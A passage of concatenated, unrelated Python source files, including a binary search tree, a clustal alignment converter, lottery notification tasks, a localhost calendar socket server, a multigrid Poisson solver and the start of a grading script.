        *root* (the product of the differences is positive), descend to
        that side.  Assumes both nodes are present in the tree.
        """
        while (root.data - p.data) * (root.data - q.data) > 0:
            root = (root.left, root.right)[p.data > root.data]
        return root
    def search(self, value):
        """
        Value will be to the left of node if node > value; right otherwise.
        Returns the matching Node, or False when *value* is absent.
        """
        node = self.root
        while node is not None:
            if node.data == value:
                return node # node.value
            if node.data > value:
                node = node.left
            else:
                node = node.right
        return False
""" tree = BST()
done = False
while done == False :
user = input("Enter a value to add to bst or 'lca': ")
if(user != "lca"):
tree.insert_node(int(user))
else:
value1 = int(input("Enter the first value: "))
value2 = int(input("Enter the second value: "))
node1 = tree.search(value1)
node2 = tree.search(value2)
print("The lowest common ancestor of these values is: " )
print(tree.lowestCommonAncestor(tree.root, node1, node2).data)
done = True """
""" tree.insert_node(7)
tree.insert_node(3)
tree.insert_node(8)
tree.insert_node(12)
tree.insert_node(1)
tree.insert_node(9)
tree.insert_node(4)
tree.insert_node(6)
value1 = int(input("Enter the first value: "))
value2 = int(input("Enter the second value: "))
node1 = tree.search(value1)
node2 = tree.search(value2)
print(tree.lowestCommonAncestor(tree.root, node1, node2).data) """
|
#!/usr/bin/env python
"""
Convert clustal alignment files to grishin for use in rosetta
Author: Ed van Bruggen <edvb@uw.edu>
"""
import sys
import argparse
from argparse import RawTextHelpFormatter
parser = argparse.ArgumentParser(description=__doc__, formatter_class=RawTextHelpFormatter)
parser.add_argument('--file', type=str, required=True,
                    help='input clustal alignment file')
parser.add_argument('--target', metavar='POS', type=int, default=1,
                    help='position of target protein (default: 1)')
args = parser.parse_args()

# Accumulate each protein's aligned sequence across the clustal blocks.
# `proteins` is a list of [name, sequence] pairs in first-seen order.
proteins = []
with open(args.file) as aln:  # `with` ensures the handle is closed (was leaked)
    for i, line in enumerate(aln):
        # Skip the clustal header line, blank lines and conservation rows.
        if i == 0 or line == '\n' or line[0] == ' ':
            continue
        words = line.split()
        for protein in proteins:
            if protein[0] == words[0]:
                protein[1] += words[1]
                # Names are unique, so stop scanning once matched (the
                # original `continue` kept scanning the rest needlessly).
                break
        else:
            proteins.append([words[0], words[1]])

# Write one grishin alignment file per non-target protein.
target = proteins[args.target - 1]
for protein in proteins:
    if protein == target:
        continue
    with open(target[0] + "_" + protein[0] + ".grishin", "w") as grishin:
        grishin.write("## %s %s_thread\n#\nscores from program: 0\n0 %s\n0 %s\n" %
                      (target[0], protein[0], target[1], protein[1]))
|
from time import sleep
from features.clock import Clock
from field import Field
from multiply import multiply
from painter import Led_Matrix_Painter, RGB_Field_Painter
from rainbow import rainbowcolors
class Rainbowclock(Clock):
    """Clock variant that tints the LED field with a scrolling rainbow."""

    def __init__(self, field_leds: Field, field_matrix: Field, rgb_field_painter: RGB_Field_Painter,
                 led_matrix_painter: Led_Matrix_Painter):
        """Set up the base clock and precompute the rainbow colour table."""
        super(Rainbowclock, self).__init__(field_leds, field_matrix, rgb_field_painter, led_matrix_painter)
        self.COLORS = 60
        self.r = rainbowcolors(self.COLORS + 20, (self.COLORS + 20) / self.COLORS)
        self.currentrainbowstart = 0

    def tick(self):
        """Draw one frame: date text, scrolled rainbow backdrop, clock mask."""
        self.led_matrix_painter.show_Text(self.get_date_string())
        backdrop = Field(10, 20)
        # Advance the rainbow offset, wrapping at COLORS.
        self.currentrainbowstart = (self.currentrainbowstart + 1) % self.COLORS
        for column in range(10):
            for row in range(20):
                backdrop.set_pixel(column, row, self.r[row + self.currentrainbowstart])
        self.draw_clock([255, 255, 255])
        rainbowtime = multiply(backdrop, self.field_leds)
        self.rgb_field_painter.draw(rainbowtime)
        sleep(0.05)
|
../_rostf.py |
# Generated by Django 2.2.3 on 2019-11-06 15:17
from django.db import migrations, models
class Migration(migrations.Migration):
    """Drops the description/image fields from Product and widens the
    `product` name field (blank/nullable CharField with a default)."""
    dependencies = [
        ('product', '0002_auto_20191106_0907'),
    ]
    operations = [
        migrations.RemoveField(
            model_name='product',
            name='description',
        ),
        migrations.RemoveField(
            model_name='product',
            name='image',
        ),
        migrations.AlterField(
            model_name='product',
            name='product',
            field=models.CharField(blank=True, default='Pomodoro', max_length=60, null=True),
        ),
    ]
|
import sys
import os
# The path to inspect comes from the command line.  sys.argv[0] is this
# script itself, so the user's argument is sys.argv[1] (the original code
# read argv[0], which never pointed at the directory being asked about).
path = str(sys.argv[1]) if len(sys.argv) > 1 else ''
# Only directories can be listed; os.path.exists would also accept plain
# files and then crash inside os.listdir.
if os.path.isdir(path):
    tree = os.listdir(path)
    print(tree)
else:
    print("This path is not real! Try another path!")
|
import random
import datetime
from celery.task import PeriodicTask, task
from celery.schedules import crontab
from yoolotto.util.async import report_errors
from yoolotto.lottery.models import LotteryCountryDivision
class UpdateDraws(PeriodicTask):
    """Periodic celery task: refresh lottery draw and winning data.

    Runs every 30 minutes; pulls remote data through the common draw and
    winning importers."""
    run_every = datetime.timedelta(minutes=30)
    @report_errors
    def run(self, **kwargs):
        # Imports are function-local -- presumably to avoid circular imports
        # at module load time (TODO confirm).
        from yoolotto.lottery.feed.draw_common_importer import LotteryCommonDrawImporter,\
            CommonDrawDataProvider
        from yoolotto.lottery.feed.winning_common_importer import LotteryCommonWinningImporter,\
            CommonWinningDataProvider
        lcdi=LotteryCommonDrawImporter(CommonDrawDataProvider.remote)
        lcdi.run()
        lcwi=LotteryCommonWinningImporter(CommonWinningDataProvider.remote)
        lcwi.run()
# Integer state codes sent to the iPhone client instead of the string
# remote_id (e.g. "TX" -> 0).  Note the gap: there is no code 1.
state_codes={
    "TX":0,
    "CA":2,
    "AZ":3,
    "AR":4,
    "CO":5,
    "CT":6,
    "DE":7,
    "DC":8,
    "FL":9,
    "GA":10,
    "ID":11,
    "IL":12,
    "IN":13,
    "IA":14,
    "KS":15,
    "KY":16,
    "LA":17,
    "ME":18,
    "MD":19,
    "MA":20,
    "MI":21,
    "MN":22,
    "MO":23,
    "MT":24,
    "NE":25,
    "NH":26,
    "NJ":27,
    "NM":28,
    "NY":29,
    "NC":30,
    "ND":31,
    "OH":32,
    "OK":33,
    "OR":34,
    "PA":35,
    "RI":36,
    "SC":37,
    "SD":38,
    "TN":39,
    "VT":40,
    "VA":41,
    "WA":42,
    "WI":43,
    "WV":44,
    "WY":45
    }
@task
@report_errors
def notify_draw_result_all(draw_id):
    """Fan out per-ticket result notifications for one draw.

    Tickets with unchecked submissions that have not been notified yet are
    scheduled individually with a random delay (spreads load over 30 s).
    """
    from yoolotto.lottery.models import LotteryTicket
    for _id in set([x["pk"] for x in LotteryTicket.objects.filter(
            draw_id=int(draw_id), submissions__checked=False, notified=False).values("pk")]):
        notify_draw_result_for_ticket.apply_async(countdown=random.randrange(30),
            kwargs={"ticket_id": _id})
@task
@report_errors
def notify_draw_result_for_ticket(ticket_id):
    """Push a draw-result notification for one ticket to every user device.

    Sends APNs to iOS devices and GCM to Android devices, marks the ticket
    as notified, and returns a log string for debugging.
    """
    from yoolotto.lottery.models import LotteryTicket
    from yoolotto.communication.apn import APNSender
    from yoolotto.communication.gcm_sender import GCMSender
    try:
        ticket = LotteryTicket.objects.get(pk=int(ticket_id))
    except (LotteryTicket.DoesNotExist, ValueError):
        # Was a bare `except:` that swallowed every error (including
        # programming errors); only "ticket gone" / "bad id" are expected.
        return
    if not ticket.user.preferences.jackpot_drawing:
        return
    log = ""
    log += "\nTicket: " + str(ticket.pk)
    text = "Results available for %s" % ticket.draw.component.name
    log += "\n" + text
    for device in ticket.user.devices.all():
        if not device.device_token:
            log += "\nSkipped Device, No Token"
            continue
        if device.is_ios():
            apn = APNSender(device.device_token, text=text,
                custom={"code": "draw", "drawId": ticket.draw.pk,"state":state_codes[ticket.division.remote_id]})
            apn.send()
            log += "\nAPN Outbound: %s" % device.device_token
        elif device.is_android():
            gcm = GCMSender(to=[device.device_token], data={"text": text,
                "code": "draw", "drawId": ticket.draw.pk,"state":ticket.division.remote_id,"ticket_id":ticket.id
                })
            gcm.send()
            log += "\nGCM Outbound: %s" % device.device_token
    ticket.notified = True
    ticket.save()
    return log
class FrenzyDailyNotification(PeriodicTask):
    """Every 20 minutes, find today's official draws with a jackpot of at
    least $75M and no result yet, and trigger frenzy notifications for any
    that have not had a frenzy in the last 18 hours.

    NOTE(review): uses a Python 2 print statement — this module is py2-only.
    """
    run_every = datetime.timedelta(minutes=20)
    #run_every = crontab(minute="5", hour="18")

    @report_errors
    def run(self, **kwargs):
        from yoolotto.lottery.models import LotteryDraw
        candidates = LotteryDraw.objects.filter(
            jackpot__gte=75000000, official=True, result__isnull=True,
            date__gte=datetime.date.today())
        print "Candidates:", candidates
        for candidate in candidates:
            # Skip draws already frenzied within the last 18 hours.
            frenzy = candidate.frenzies.filter(
                added_at__gte=datetime.datetime.now()-datetime.timedelta(hours=18))
            if frenzy:
                continue
            # Only notify for draws happening today.
            if candidate.date != datetime.date.today():
                continue
            notify_frenzy_all.apply_async(countdown=5, kwargs={"draw_id": candidate.pk})
@task
@report_errors
def notify_frenzy_all(draw_id):
    """Mark *draw_id* as frenzied, record a LotteryDrawFrenzy, and fan out one
    notify_frenzy_for_user task per opted-in user (jittered over up to 60s)."""
    from yoolotto.lottery.enumerations import EnumerationManager
    from yoolotto.lottery.models import LotteryDraw, LotteryDrawFrenzy
    from yoolotto.user.models import YooLottoUser
    draw = LotteryDraw.objects.get(pk=int(draw_id))
    # Re-check the jackpot threshold in case it changed since scheduling.
    if draw.jackpot < 75000000:
        return
    draw.frenzied = True
    draw.save()
    frenzy = LotteryDrawFrenzy(draw=draw)
    frenzy.save()
    # print "TESTING", draw, frenzy
    # return
    component_name = draw.component.name
    draw_value = "{:,}".format(draw.jackpot)  # e.g. "75,000,000"
    game_type = EnumerationManager.game_reverse(draw.component.parent.pk)
    for user in YooLottoUser.objects.filter(preferences__jackpot_frenzy=True).values("pk"):
        notify_frenzy_for_user.apply_async(countdown=random.randrange(60),
            kwargs={"component_name": component_name, "draw_value": draw_value,
            "game_type": game_type, "user_id": user["pk"],"draw_id":draw_id})
@task
@report_errors
def notify_frenzy_for_user(component_name, draw_value, game_type,user_id,draw_id):
    """Send jackpot-frenzy push notifications to one user's devices.

    The draw's state is notified only when it is TX for a first-time user or
    a state the user has played before; for TX Megamillions/Powerball
    (game_type 0/1) duplicates are also sent for the user's historical
    states (except CA). Returns a text log of what was sent.
    """
    from yoolotto.lottery.models import LotteryDraw
    from yoolotto.user.models import YooLottoUser
    from yoolotto.communication.apn import APNSender
    from yoolotto.communication.gcm_sender import GCMSender
    state=LotteryDraw.objects.get(id=draw_id).division.remote_id
    # reducing multiple frenzies notification for any user ,
    # based on user old hits for states in history
    # and also sending duplicate notification for state TX and game_type in 0/1 Megamillion/Powerball
    old_states=[str(_state) for _state in set(YooLottoUser.objects.get(id=user_id).tickets.values_list('division__remote_id',flat=True))]
    send_for_states=[]
    log=""
    if (not old_states and state=="TX"):
        # Brand-new user: default to TX only.
        send_for_states.append("TX")
    elif (state in old_states):
        send_for_states.append(state)
    else:
        log += "\nDevice auto skipped ,assume unnecessary state: %s" % state
    if old_states and state=="TX" and game_type in [0,1]: # 0/Megamillion(TX),1/Powerball(TX):
        #send duplicate notification for state that user has already played
        [send_for_states.append(i) for i in old_states if i!="CA"]
    send_for_states=list(set(send_for_states))
    for _index,right_state in enumerate(send_for_states):#loop for duplicate notification
        if right_state!="TX" and len(send_for_states) > 1:
            log += "\n Send duplicate notification for state: %s" % right_state
        user = YooLottoUser.objects.get(pk=int(user_id))
        log += "\nUser: " + str(user.pk)
        state_name=LotteryCountryDivision.objects.get(remote_id=right_state).name.title()
        text = "%s %s Jackpot is %s!" % (state_name,component_name, draw_value)
        log += "\n" + text
        for device in user.devices.all():
            if not device.device_token:
                log += "\nSkipped Device, No Token"
                continue
            if device.is_ios():
                apn = APNSender(device.device_token, text=text,
                    custom={"code": "frenzy", "gameType": game_type,
                    "state":state_codes[right_state],
                    "drawId":draw_id
                    })
                apn.send()
                log += "\nAPN Outbound: %s" % device.device_token
            elif device.is_android():
                # NOTE(review): draw_id+_index makes each duplicate carry a
                # different (non-existent?) draw id — presumably to defeat
                # client-side de-duplication; confirm against the app.
                gcm = GCMSender(to=[device.device_token], data={"text": text,
                    "code": "frenzy", "gameType": game_type,
                    "state":right_state,
                    "draw_id":draw_id+_index
                    })
                gcm.send()
                log += "\nGCM Outbound: %s" % device.device_token
        log += "\n ---------------------------- \n"
    return log
|
import socket
import threading
# class for creating servers
# class for creating servers
class Server:
    """TCP server that hands each accepted connection to handle_client
    on its own thread."""

    def __init__(self):
        # Loopback only, fixed port.
        self.SERVER = "127.0.0.1"
        self.PORT = 8080
        self.ADDR = (self.SERVER, self.PORT)
        self.server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        self.server.bind(self.ADDR)

    def start(self):
        # Build the calendar grid once before accepting clients.
        # (`calendar` and `handle_client` are module-level names defined below.)
        calendar.struct_calendar()
        self.server.listen()
        while True:
            conn, addr = self.server.accept()
            thread = threading.Thread(target=handle_client, args=(conn, addr))
            thread.start()
            # -1: don't count the main (accept) thread.
            print("Active connections", threading.active_count() - 1)
# Class for creating calendars
class Month:
    """Calendar model: month lengths and names, booked meetings, and a
    printable page per month."""

    def __init__(self):
        # BUG FIX: user_meetings/calendar_page were *class-level* mutable
        # attributes, silently shared by every Month instance; they are now
        # per-instance state. (The program only ever creates one instance.)
        # user_meetings: {"<month>": {"<day>": [Activity, ...]}}
        self.user_meetings = {}
        self.calendar_page = []
        # February is stored as 29 days (leap-year tolerant).
        self.months = [31, 29, 31, 30, 31, 30, 31, 31, 30, 31, 30, 31]
        self.months_name = [
            "january", "february", "march", "april",
            "may", "june", "july", "august", "september",
            "october", "november", "december"
        ]

    # add activities to the activity list
    def add_activity(self, activity):
        """File *activity* under its "month/day" date."""
        date = activity.date.split("/")
        month = str(int(date[0]))
        day = str(int(date[1]))
        self.user_meetings.setdefault(month, {}).setdefault(day, []).append(activity)

    # get an activity
    def get_activities(self, month, day):
        """Return a printable summary of the meetings on month/day, or a
        'no meetings' message when there are none."""
        day = str(day)
        month = str(month)
        meetings = self.user_meetings.get(month, {}).get(day)
        if meetings is None:
            return "No meetings on that day"
        stringify = ""
        for value in meetings:
            stringify += f"""
        ---------------------------------------------------------
        By {value.user.username} Date: {value.date}
        {value.title}
        -----------Description-----------
        {value.description}
        ---------------------------------------------------------\n"""
        return stringify

    # fetch a month
    def fetch_month(self, month):
        """Normalize *month* (1-12 number or lowercase name) to a 0-based
        index into months/months_name; return False when invalid."""
        try:
            month = int(month)
        except ValueError:
            pass
        if isinstance(month, int):
            if month < 1 or month > 12:
                return False
            return month - 1
        if month in self.months_name:
            return self.months_name.index(month)
        return False

    # struct the calendar
    def struct_calendar(self):
        """(Re)build calendar_page: one list per month, [name, 1..days].

        BUG FIX: the original appended on every call, so calling it twice
        duplicated all twelve pages; it now rebuilds from scratch.
        """
        self.calendar_page = [
            [name] + list(range(1, days + 1))
            for name, days in zip(self.months_name, self.months)
        ]

    def add_calendar_activity(self, date):
        """Mark the day of a "month/day" *date* with "X" on its month page."""
        splitted = date.split("/")
        month = int(splitted[0])
        day = int(splitted[1])
        page = self.calendar_page[month - 1]
        # Index `day` holds the number `day` (index 0 is the month name);
        # the original relied on this implicitly by using the value as index.
        if 0 < day < len(page) and page[day] == day:
            page[day] = "X"
# class for creating activities
class Activity:
    """One booked meeting: a "month/day" date, a title and a description.

    `user` starts out empty and is later set to the Client that booked it.
    """

    def __init__(self, date, title, description):
        self.date = date
        self.title = title
        self.description = description
        self.user = ""
# class creating new clients
class Client:
    """Per-connection client state: remote address plus the chosen username."""

    def __init__(self, addr):
        self.addr = addr
        self.username = ""

    def set_username(self, username):
        self.username = username
# creating new calendar by default
# Module-level singleton shared by the server and every client handler.
calendar = Month()
# Menu text sent to each client on login and via the "help" command.
welcome_message = """
----------------
Welcome to the calendar!
These are the menus you can use
calendar - Open and select a month to see your currently booked meetings
add - Add a new meeting
help - bring up the menu again
exit - Quit application
----------------
"""
# check if day is valid
def check_day(day, month):
    """Return True when *day* is a valid day number for *month*.

    *month* is the 0-based index produced by Month.fetch_month; both
    arguments may arrive as strings.
    """
    try:
        day = int(day)
        month = int(month)
    except ValueError:
        return False
    # `calendar` is the module-level Month singleton.
    return 1 <= day <= calendar.months[month]
# check if date is valid
def check_date(date):
    """Return True when *date* is a "month/day" string naming a real day."""
    if "/" not in date:
        return False
    parts = date.split("/")
    try:
        month = int(parts[0])
        day = int(parts[1])
    except ValueError:
        return False
    return 1 <= month <= 12 and 1 <= day <= calendar.months[month - 1]
# send calendar to client
def send_calendar(calendar):
    """Render one month page (a list: [name, 1, 2, ...]) as bracketed rows.

    The row counter starts at zero, so the first entry — the month name —
    sits alone on the first row, followed by rows of seven day numbers.
    """
    rows = "["
    for position, entry in enumerate(calendar):
        rows += f" {entry} "
        if position % 7 == 0:
            rows += "]\n["
    return f"{rows}]"
def handle_activity(date, title, description, user):
    """Build an Activity from client input and register it on the calendar.

    *date* arrives as raw bytes from the socket; title/description are
    already decoded by the caller.
    """
    activity = Activity(date.decode(), title, description)
    activity.user = user
    calendar.add_activity(activity)
# check calendar for activities based on input
def read_calender(conn, calendar):
    """Interactive month browser: ask the client for a month, send its page,
    then keep answering day queries until an invalid day is entered."""
    conn.send(b'Which month do you want to fetch? Input either a number or by month name')
    data = conn.recv(1024)
    # fetch_month returns a 0-based month index, or False when invalid.
    month = calendar.fetch_month(data.decode())
    if month is not False:
        string = send_calendar(calendar.calendar_page[month])
        conn.send(string.encode() + b'\nInput a day you want to check')
        while True:
            day = conn.recv(1024)
            if check_day(day.decode(), month):
                # get_activities expects the 1-based month number.
                meetings = calendar.get_activities(month+1, day.decode())
                conn.send(meetings.encode())
            else:
                # Any invalid day (or non-number) exits the browser.
                conn.send(b"Returning to main menu")
                break
    else:
        conn.send(b'Input invalid')
def create_user(conn, user):
    """Ask the client for a name, store it on *user*, and send the menu."""
    conn.send(b'What is your name?')
    data = conn.recv(1024)
    if data:
        user.set_username(data.decode())
        conn.send(b"Welcome user: " + user.username.encode() + welcome_message.encode())
def help_page(conn):
    """Send the menu/help text to the client."""
    conn.send(welcome_message.encode())
# create new activity
def create_activity(conn):
    """Prompt the client for a meeting's date, title and description.

    Returns (date, title, description) as raw bytes on success, or
    (False, False, False) when the date is invalid.
    """
    conn.send(b'Which date is the meeting?')
    date = conn.recv(1024)
    if check_date(date.decode()):
        conn.send(b'What is the title of your meeting?')
        title = conn.recv(1024)
        conn.send(b'Give your meeting a description.')
        description = conn.recv(1024)
        return date, title, description
    else:
        conn.send(b"Error not a date")
        return False, False, False
# main menu for each new thread
def handle_client(conn, addr):
    """Per-connection loop: collect a username, then dispatch the commands
    exit / help / add / calendar until the client leaves or disconnects."""
    print("New connection")
    connected = True
    user = Client(addr)
    while connected:
        if not user.username:
            create_user(conn, user)
        else:
            data = conn.recv(1024)
            if data:
                print(f"Received string from {user.username}: {data.decode()}")
                # -----Exit application-----
                if (data.decode()).lower() == "exit":
                    connected = False
                elif (data.decode()).lower() == "help":
                    help_page(conn)
                # -----Add new activity-----
                elif (data.decode()).lower() == "add":
                    date, title, description = create_activity(conn)
                    if date is not False:
                        handle_activity(date, title.decode(), description.decode(), user)
                        calendar.add_calendar_activity(date.decode())
                        conn.send(b"New meeting added! \nReturning to main menu.")
                # -----Check the calendar and activities-----
                elif (data.decode()).lower() == "calendar":
                    read_calender(conn, calendar)
                # runs if the command doesn't exist
                else:
                    conn.send(b'Not a command')
            else:
                # Empty recv: the peer closed the connection.
                connected = False
                break
    print(f"{user.username} has disconnected")
    # NOTE(review): this send can raise if the peer already closed the
    # socket (the `break` path above) — confirm intended behavior.
    conn.send(b'You have disconnected')
    conn.close()
# starts server and make it listen for new connections
def start_new_server():
    """Create the Server and block forever accepting connections."""
    print("Starting server...")
    server = Server()
    server.start()

if __name__ == '__main__':
    start_new_server()
|
class Site:
    """Resolve an IRC user's (site, section) request to an RSS/XML feed URL."""

    #init parameters: self, users site + section from IRC.
    def __init__(self, siteInput, sectionInput):
        self.siteInput = siteInput
        self.sectionInput = sectionInput
        # BUG FIX: the original called retTargetSite() here and discarded
        # its return value; store it so callers can read the resolved URL.
        self.targetSite = self.retTargetSite()

    #Function to return target RSS/XML file for parsing.
    def retTargetSite(self):
        """Return the feed URL for (siteInput, sectionInput), or None when
        either the site or the section is unknown."""
        # Feeds per supported site; keys are the section names users may type.
        # (Replaces the original's py2-only iterkeys() linear scans with
        # plain dict lookups.)
        feeds = {
            'irishtimes': {
                'main': 'http://www.irishtimes.com/feeds/rss/newspaper/index.rss',
                'ireland': 'http://www.irishtimes.com/feeds/rss/breaking/irish.rss',
                'world': 'http://www.irishtimes.com/feeds/rss/breaking/world.rss',
                'business': 'http://www.irishtimes.com/feeds/rss/breaking/business.rss',
                'sport': 'http://www.irishtimes.com/feeds/rss/breaking/sports.rss',
                'technology': 'http://www.irishtimes.com/feeds/rss/breaking/technology.rss',
            },
            'rte': {
                'main': 'http://www.rte.ie/rss/news.xml',
                'sports': 'http://www.rte.ie/rss/sport.xml',
                'business': 'http://www.rte.ie/rss/business.xml',
                'entertainment': 'http://www.rte.ie/rss/entertainment.xml',
            },
            'bbc': {
                'headlines': 'http://feeds.bbci.co.uk/news/rss.xml',
                'world': 'http://feeds.bbci.co.uk/news/world/rss.xml',
                'uk': 'http://feeds.bbci.co.uk/news/uk/rss.xml',
                'business': 'http://feeds.bbci.co.uk/news/business/rss.xml',
                'politics': 'http://feeds.bbci.co.uk/news/politics/rss.xml',
                'health': 'http://feeds.bbci.co.uk/news/health/rss.xml',
                'education': 'http://feeds.bbci.co.uk/news/education/rss.xml',
                'science': 'http://feeds.bbci.co.uk/news/science_and_environment/rss.xml',
                'technology': 'http://feeds.bbci.co.uk/news/technology/rss.xml',
                'arts': 'http://feeds.bbci.co.uk/news/entertainment_and_arts/rss.xml',
            },
        }
        site = feeds.get(self.siteInput)
        if site is None:
            return None
        return site.get(self.sectionInput)
|
# from Geron, 14_recurrent_neural_networks
# Demonstrate an RNN with two time steps, hardcoded
import numpy as np
import tensorflow as tf
def reset_graph(seed=42):
    """Clear the TF1 default graph and seed both TF and NumPy RNGs so the
    demo is reproducible run to run."""
    tf.reset_default_graph()
    tf.set_random_seed(seed)
    np.random.seed(seed)
reset_graph()
n_inputs = 3
n_neurons = 5
# One placeholder per time step (static, hand-unrolled TF1 RNN).
X0 = tf.placeholder(tf.float32, [None, n_inputs])
X1 = tf.placeholder(tf.float32, [None, n_inputs])
# Wx: input-to-hidden weights; Wy: hidden-to-hidden (recurrent) weights.
Wx = tf.Variable(tf.random_normal(shape=[n_inputs, n_neurons],dtype=tf.float32))
Wy = tf.Variable(tf.random_normal(shape=[n_neurons,n_neurons],dtype=tf.float32))
b = tf.Variable(tf.zeros([1, n_neurons], dtype=tf.float32))
Y0 = tf.tanh(tf.matmul(X0, Wx) + b) # first output does not depend on previous
Y1 = tf.tanh(tf.matmul(Y0, Wy) + tf.matmul(X1, Wx) + b) # next output
init = tf.global_variables_initializer()
# create some data (3 inputs)
# Minibatch: instance 0 instance 1 instance 2 instance 3
X0_batch = np.array([[0, 1, 2], [3, 4, 5], [6, 7, 8], [9, 0, 1]]) # t = 0
X1_batch = np.array([[9, 8, 7], [0, 0, 0], [6, 5, 4], [3, 2, 1]]) # t = 1
with tf.Session() as sess:
    init.run()
    Y0_val, Y1_val = sess.run([Y0, Y1], feed_dict={X0: X0_batch, X1: X1_batch})
print(Y0_val) # output at time t=0
# prints instance 0 \\ instance 1 \\ instance 2 \\ instance 3
print(Y1_val) # output at time t=1 (original comment said t=0)
# prints instance 0 \\ instance 1 \\ instance 2 \\ instance 3
|
from PyQt4 import QtCore, QtGui
import sys, os
# Import the new defined class here.
from MainScreen import *
def _init():
    """Create the Qt application, show the main window, and enter the
    event loop (blocks until the window closes)."""
    # NOTE(review): QApplication/MainWindow are unqualified — presumably
    # re-exported by `from MainScreen import *`, since PyQt4 was imported
    # only as QtCore/QtGui above. Confirm.
    app = QApplication(sys.argv)
    window = MainWindow()
    window.show()
    window.raise_()  # bring the window to the foreground
    app.exec_()

# Runs at import time: the original has no __main__ guard.
_init()
|
import numpy as np
from NumericalModeling.scripts.matrix_generator import *
import sys
def read_input_file(input_path):
    """Parse the solver's input file.

    The first line holds three space-separated numbers "f M eps"; every
    remaining line is one row of the grid G.

    Returns:
        (f, M, eps, G) where f is float, M int, eps float and G a 2-D
        numpy array stacked from the remaining rows.
    """
    with open(input_path, "r") as infile:  # close the handle (original leaked it)
        lines = infile.readlines()
    header = list(map(float, lines[0].split(' ')))
    # BUG FIX: the original read both f and M from header[1] and never used
    # header[0]; take f from the first token. Also stop shadowing the file
    # handle variable `f`.
    f = float(header[0])
    M = int(header[1])
    eps = float(header[2])
    G = np.stack([np.array(list(map(float, row.split(' ')))) for row in lines[1:]])
    return f, M, eps, G
def smoother(A, b, x0=None, eps=1e-10, max_iter=1000):
    """Gauss-Seidel smoother for the linear system A x = b.

    Args:
        A: square coefficient matrix.
        b: right-hand side vector.
        x0: optional initial guess (updated in place, as in the original).
        eps: stop when the max-norm change between sweeps drops below this.
        max_iter: sweep limit.

    Returns:
        (x, iterations); returns (-1, 0) when A is not square (interface
        kept from the original).
    """
    if A.shape[0] != A.shape[1]:
        x = -1
        iter_n = 0
        return x, iter_n
    n = A.shape[0]
    iter_n = 0
    err = 1
    if x0 is not None:
        x = x0
    else:
        x = np.zeros(n) + eps
    while (err >= eps) and (iter_n < max_iter):
        # BUG FIX: the original did `x0 = x`, aliasing the same array, so
        # the error below was always 0 and the loop stopped after one sweep.
        x_prev = x.copy()
        for i in range(n):
            # Gauss-Seidel update: uses already-updated entries of x.
            x[i] = b[i] - A[i, :] @ x + A[i, i] * x[i]
            x[i] = x[i] / A[i, i]
        iter_n += 1
        err = max(abs(x_prev - x))
    return x, iter_n
def vcycle(level, A_list, R_list, b, x0, direct, PR_coef, pre_steps=1, pos_steps=1):
    """Recursive multigrid V-cycle at grid *level*.

    Args:
        level: index into A_list/R_list for the current grid.
        A_list: system matrices per level.
        R_list: restriction operators per level.
        b: right-hand side on this level.
        x0: initial guess on this level.
        direct: solve directly once the system is this small.
        PR_coef: scaling applied to R.T to form the prolongation operator.
        pre_steps/pos_steps: pre-/post-smoothing sweep counts.

    Returns the (approximately) corrected solution on this level.
    """
    A = A_list[level]
    n = b.shape[0]
    # Coarsest grid: solve directly.
    if n <= direct:
        x = np.linalg.solve(A, b)
        return x
    # Pre-smoothing.
    x, _ = smoother(A, b, x0=x0, eps=1e-14, max_iter=pre_steps)
    R = R_list[level]
    P = R.T * PR_coef  # prolongation = scaled restriction transpose
    coarse_n = R.shape[0]
    # (Removed a leftover debug print of the operator shapes here.)
    # Compute the residual and restrict (project) it to the coarse grid.
    r = b - A @ x
    r_H = R @ r
    x0 = np.zeros(coarse_n)
    e_H = vcycle(level + 1, A_list, R_list, r_H, x0, direct, PR_coef, pre_steps, pos_steps)
    # Interpolate the coarse error to the fine grid and correct.
    x = x + P @ e_H
    # Apply post smoothing.
    x, _ = smoother(A, b, eps=1e-14, max_iter=pos_steps, x0=x)
    return x
def multigrid_solver(A, b, pre_steps=1, pos_steps=1, rn_tol=1e-10):
    """Solve A x = b with repeated multigrid V-cycles.

    Iterates until the residual 2-norm falls below rn_tol * ||b||.

    Returns:
        (x, vcycle_count, residual_norms) — residual_norms starts with ||b||
        and gains one entry per V-cycle.
    """
    # BUG FIX: the original shadowed pre_steps/pos_steps with hard-coded
    # locals (so the parameters were ignored) and never incremented
    # vcycle_cnt, which was always returned as 0.
    n = A.shape[0]
    x = np.zeros(n)
    rn = np.linalg.norm(b, 2)
    vcycle_cnt = 0
    res_norm = []
    res_norm.append(rn)
    rn_stop = rn * rn_tol
    PR_coef = 4   # prolongation scaling (see vcycle)
    direct = 49   # solve directly once a grid has <= this many unknowns
    A_list, R_list, max_level = build_multigrid(A, direct)
    while (rn > rn_stop):
        x = vcycle(1, A_list, R_list, b, x, direct, PR_coef,
                   pre_steps=pre_steps, pos_steps=pos_steps)
        vcycle_cnt += 1
        r = b - A @ x
        rn = np.linalg.norm(r, 2)
        res_norm.append(rn)
    return x, vcycle_cnt, res_norm
def poisson2d_run(G, M, f, eps):
    """Assemble the 2-D Poisson system for grid G and solve it with the
    multigrid solver; returns (solution vector, node coordinates)."""
    A, b, coords = build_matrix_poisson(G, M, f)
    x, vc_cnt, res_norm = multigrid_solver(A, b, rn_tol=eps)
    return x, coords
#def main(argv):
# M, eps, f, G = read_input_file(argv[0])
# x = poisson2d_run(G, M, f, eps)
# #f2 = open(argv[1], "w")
#if __name__=="__main__":
# main(sys.argv[1:])
|
import os
import subprocess
import sys
import shutil
import yaml
import colorama
from colorama import Style, Fore, Back
import grading_module as gm
# Load grader configuration.
with open("base_config.yaml", 'r') as ymlfile:
    cfg = yaml.load(ymlfile, Loader=yaml.FullLoader)
# NOTE(review): `dir` (and `id` in the loop below) shadow builtins.
dir = cfg['dir']
methods = cfg['methods']
output_only = cfg['output_only']
check_file = cfg['check_file']
modify = cfg['modify'] # 1 is a function 2 is modify tests for output test anything else is regular output
editor = cfg['editor']
gm.validate_dirs(dir)
if modify == 1:
    # Function-grading mode: load function tests plus expected file output.
    solutions = gm.load_f_solutions(dir['sol'])
    tests = gm.load_f_tests(dir['test'])
    file_sol = gm.load_solutions(dir['sol_out'])
    verbose = gm.load_f_solutions(dir['sol'])
else:
    # Output-grading mode.
    # NOTE(review): file_sol is NOT defined on this branch but is used later
    # when check_file is true — confirm that config combination is invalid.
    solutions = gm.load_solutions(dir['sol'])
    tests = gm.load_tests(dir['test'])
    verbose = gm.load_readable_solutions(dir['sol'])
target_letter = ''
